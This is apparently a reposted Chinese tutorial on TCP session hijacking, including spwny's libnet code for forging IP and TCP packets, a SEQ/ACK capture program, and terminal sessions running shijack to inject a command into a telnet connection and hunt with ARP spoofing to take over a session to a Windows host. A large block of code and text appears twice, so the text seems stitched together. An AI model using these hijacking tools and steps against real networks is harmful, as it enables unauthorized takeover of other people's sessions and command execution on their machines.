  这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
  
   
  
  ======================================================================================
  
  接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
  
  
  
  Ip protocol :
  
  
  
   0 4 8 16 19 24 32
   ------------------------------------------------------------------------
   | VERS | HLEN | Service Type | Total Length |
   ------------------------------------------------------------------------
   | Identification | Flags | Fragment Offset |
   ------------------------------------------------------------------------
   | Source IP Address |
   ------------------------------------------------------------------------
   | Destination IP Address |
   ------------------------------------------------------------------------
   | IP Options | Padding |
   ------------------------------------------------------------------------
   | Data |
   ------------------------------------------------------------------------
  
  对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
  
   
  
  /******************************************************************************/
  
  Written by spwny
  
   
  
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
  u_char *packet;
  int fd, psize;
  
  psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
  libnet_init_packet(psize, &packet);
   
  
  if (!packet)
  libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
  fd = libnet_open_raw_sock(IPPROTO_RAW);
  if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
  
  libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
  libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
  
  if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
  libnet_write_ip(fd, packet, psize);
  libnet_close_raw_sock(fd);
  libnet_destroy_packet(&packet);
  }
  
   
  
  /********************************************************************************/
这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
  
  对程序进行调试并找到SEQ和ACK:
  
   
  
  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
  这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
  
   
  
  ======================================================================================
  
  接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
  
  
  
  Ip protocol :
  
  
  
   0 4 8 16 19 24 32
   ------------------------------------------------------------------------
   | VERS | HLEN | Service Type | Total Length |
   ------------------------------------------------------------------------
   | Identification | Flags | Fragment Offset |
   ------------------------------------------------------------------------
   | Source IP Address |
   ------------------------------------------------------------------------
   | Destination IP Address |
   ------------------------------------------------------------------------
   | IP Options | Padding |
   ------------------------------------------------------------------------
   | Data |
   ------------------------------------------------------------------------
  
  对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
  
   
  
  /******************************************************************************/
  
  Written by spwny
  
   
  
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
  u_char *packet;
  int fd, psize;
  
  psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
  libnet_init_packet(psize, &packet);
   
  
  if (!packet)
  libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
  fd = libnet_open_raw_sock(IPPROTO_RAW);
  if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
  
  libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
  libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
  
  if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
  libnet_write_ip(fd, packet, psize);
  libnet_close_raw_sock(fd);
  libnet_destroy_packet(&packet);
  }
  
   
  
  /********************************************************************************/
  这是spwny写的代码的一小部分,是介绍如何建立ip和tcp包, 并发送出去!你可以到下面这个网站看代码.
  
  http://www.securiteam.com/tools/5QP0P0K40M.html
  
  那我就拿他的代码出来试验一下啦.
  
   
  
  [chi@chi chi]$ gcc `libnet-config --defines` -o shijack shijack.c `libnet-config --libs` -lpcap -lnet
  [chi@chi chi]$ ./shijack
  Usage: ./shijack <interface> <src ip> <src port> <dst ip> <dst port> [-r]
  <interface> The interface you are going to hijack on.
  <src ip> The source ip of the connection.
  <src port> The source port of the connection.
  <dst ip> The destination IP of the connection.
  <dst port> The destination port of the connection.
  [-r] Reset the connection rather than hijacking it.
  
  Coded by spwny, Inspiration by cyclozine (http://www.geocities.com/stasikous).
  [chi@chi chi]$ ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
  pcap_open_live: socket: Operation not permitted
  [chi@chi chi]$ su root
  Password:
  [root@chi chi]# ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
  Waiting for SEQ/ACK to arrive from the srcip to the dstip.
  (To speed things up, try making some traffic between the two, /msg person asdf
  
  Got packet! SEQ = 0x2670dc37 ACK = 0x782c03bd
  Starting hijack session, Please use ^C to terminate.
  Anything you enter from now on is sent to the hijacked TCP connection.
  mkdir wokao
  Closing connection..
  Done, Exiting.
  
   
  
  如果现在你去192.168.25.4的下面看的话, 就会看到多出一个wokao的文件夹了.不过用这个程序大多数都不成功!我晕啊, 没有办法~,那就只好来看看hunt啦, 真的很好用的,成功率很大哦!有空大家自己看hunt的代码啦, 我是看到头大,难啊~~~

四 hunt的安装和使用
  
   
  
  hunt 是一个可以插入到别的通讯中的一个程序,它可监视并重启这个线程,
  
  ftp://rpmfind.net/linux/rhcontrib/7.1/i386/hunt-1.5-4.i386.rpm
  
  Requires
  ld-linux.so.2
  
  libc.so.6
  
  libpthread.so.0
  
  /bin/sh
  
  Red Hat Linux release 7.3 (Valhalla)
  Kernel 2.4.18-3 on an i686
  login: chi
  Password:
  Last login: Sat Mar 22 11:46:22 from 192.168.25.1
  [chi@chi chi]$ su root
  Password:
  [root@chi chi]# rpm -ivh hunt-1.5-4.i386.rpm
  Preparing... ########################################### [100%]
  hunt ########################################### [100%]
  [root@chi chi]# /usr/sbin/hunt
  /*
  * hunt 1.5
  * multipurpose connection intruder / sniffer for Linux
  * (c) 1998-2000 by kra
  */
  starting hunt
  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
  l/w/r) list/watch/reset connections
  u) host up tests -- 主机检测
  a) arp/simple hijack (avoids ack storm if arp used) -- 使用arp spoof的连线劫持
  s) simple hijack -- 简单的连线劫持
  d) daemons rst/arp/sniff/mac
  o) options
  x) exit
  *>
  上面的这些是hunt的基本选项. 在使用hunt前它探测连线,之后才可以插入.
...................
  *> a
  0) 192.168.25.4 [49152] --> 192.168.25.1 [23]
  1) 192.168.25.1 [3920] --> 192.168.25.3 [23]
  
  choose conn> 0
  arp spoof src in dst y/n [y]> y src是192.168.25.1 dst 是192.168.25.4 ,也就是把C的MAC改变并发给B
  src MAC [EA:1AE:AD:BE:01]> <========== MAC可以自行定义的
  arp spoof dst in src y/n [y]> y 把B的MAC改变并发给C
  dst MAC [EA:1AE:AD:BE:02]>
  input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
  dump connectin y/n [y]> y
  dump [s]rc/[d]st/[b]oth [b]> b
  print src/dst same characters y/n [n]> n
  
   
  
  CTRL-C to break
  
  这个时候, 你就已经插入到这个telnet的连线中了,不过,并没有加以劫持,所以对B和C的连线没有影响的,你只是会看到连线的过程。当B向C发送dir命令的时候.
  
  ...........
  
   
  
  C:\>dir
  <C7><FD><B6><AF><C6><F7> C <D6><D0><B5><C4><BE><ED><C3><BB><D3><D0><B1><EA><C7> <BE><ED><B5><C4><D0><F2><C1><D0><BA><C5><CA><C7> 4446-19EA
  
  C:\ <B5><C4><C4><BF><C2><BC>
  
  2002-09-30 19:07 <DIR> WINDOWS
  2000-06-08 17:00 2,164 PDOS.DEF
  2002-09-30 19:07 <DIR> Program Files
  2002-09-30 19:33 <DIR> My Documents
  2002-09-30 20:34 <DIR> Downloads
  2003-03-02 23:14 16,660 PkgClnup.log
  2003-03-22 16:58 22,092 jswx.log
  2002-10-01 18:12 <DIR> My Music
  2002-10-09 20:46 <DIR> TURBOC2
  2002-11-11 10:35 468 SCANDISK.LOG
  2002-12-16 18:11 <DIR> TC30
  2003-03-21 12:19 0 AILog.txt
  2003-03-06 22:47 13,030 PDOXUSRS.NET
  2002-10-25 01:03 209 boot.ini
  7 <B8><F6><CE><C4><BC><FE> 54,623 <D7><D6><BD><DA>
  CTRL-C to break7 <B8><F6><C4><BF><C2><BC> 1,652,977,664 <BF><C9><D3><C3><D7><D6C:\>><DA>
  
   
  
  这上面看到的和在B上面看到的是一样的,不过我们并不能对C发送命令,接下是试下劫持过这个线程,
CTRL-C to break
  
  -- press any key> you took over the connection
  ver
  
  Microsoft Windows 2000 [Version 5.00.2195]
  
  C:\>
  
   
  
  这个时候,你已经接下了这个线程, 可以自己发送命令. 不过我觉得不够的是, 因为我试验的时候B是freebsd5.0的, 所以在他的线程劫持后, 在B上就会收到这端消息!
  
   
  
  $Mar 22 13:52:14 chi kernel : arp : 192.168.25.1 move form 00:01:02:e1:35:84 to ea:1a:de:ad:be:02
  
   
  
  五 参考资料
  
  
  
  1. Simple Active Attack Against TCP pdf format
  
   
  
  2. Ed Norris “Analysis of a Telnet Session Hijack via Spoofed MAC Addresses and Session Resynchronization“
  
  URL: http://ouah.sysdoor.net/hiresync.htm
  
   
  
  3. Kra (Krauz, Pavel). “hunt.“ 1998.
  URL: http://www.tml.hut.fi/Opinnot/Tik-110.400/2000/sniffer/hunt.txt
  
   
  
  4. Michal Zalewski “Strange Attractors and TCP/IP Sequence Number Analysis“
  
  URL: http://ouah.sysdoor.net/strangeattract.htm
  
   
  
  5. Simple active attack against TCP
  
  URL: http://ouah.sysdoor.net/tcp_attack.pdf10
  
   原创: Loose


上一篇:46种可以获得Webshell的程序
下一篇:[最新]360杀毒软件最新溢出漏洞利用动画及工具
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全